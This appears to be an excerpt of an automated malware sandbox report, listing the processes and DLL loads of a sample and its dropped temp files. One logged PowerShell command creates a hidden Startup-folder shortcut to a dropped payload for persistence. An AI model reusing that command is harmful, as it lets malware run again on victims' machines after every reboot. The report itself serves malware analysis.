    Source: C:\Users\user\AppData\Local\Temp\872C.tmpProcess created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe OfficeClickToRun.exe platform=x86 culture=en-us productstoadd=O365HomePremRetail.16_en-us_x-none cdnbaseurl=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 baseurl=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 version=16.0.18526.20168 mediatype=CDN sourcetype=CDN O365HomePremRetail.excludedapps=groove bitnessmigration=False deliverymechanism=492350f6-3a01-4f97-b9c0-c7c6ddf67d60 flt.useoutlookshareaddon=unknown flt.useofficehelperaddon=unknown uninstallcentennial=True scenario=CLIENTUPDATEJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpProcess created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe OfficeClickToRun.exe platform=x86 culture=en-us productstoadd=O365HomePremRetail.16_en-us_x-none cdnbaseurl.16=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 baseurl.16=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 version.16=16.0.18526.20168 mediatype.16=CDN sourcetype.16=CDN O365HomePremRetail.excludedapps.16=groove bitnessmigration=False deliverymechanism=492350f6-3a01-4f97-b9c0-c7c6ddf67d60 flt.useoutlookshareaddon=unknown flt.useofficehelperaddon=unknown uninstallcentennial=TrueJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command " $StartupFolder = [System.Environment]::GetFolderPath('Startup') $ExePath = 'C:\Users\Public\Music\script\918D.tmp' $ShortcutPath = Join-Path -Path $StartupFolder -ChildPath 'AsMus.lnk' $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut($ShortcutPath) $Shortcut.TargetPath = $ExePath $Shortcut.WorkingDirectory = Split-Path -Parent $ExePath $Shortcut.WindowStyle = 7 $Shortcut.Description = 'AsMus' $Shortcut.Save() "Jump to behavior
    Source: C:\Users\user\Desktop\sBvrNv0wtb.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\sBvrNv0wtb.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\sBvrNv0wtb.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: msi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: windows.ui.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: inputhost.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: appxdeploymentclient.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: netprofm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: npmproxy.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: webservices.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: windows.networking.connectivity.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: windows.security.authentication.onlineid.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: bitsproxy.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: cryptnet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: cabinet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: devrtl.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: msxml6.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: pdh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: samcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: tiledatarepository.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: staterepository.core.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepository.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositorycore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: mrmcorer.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: appxdeploymentclient.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
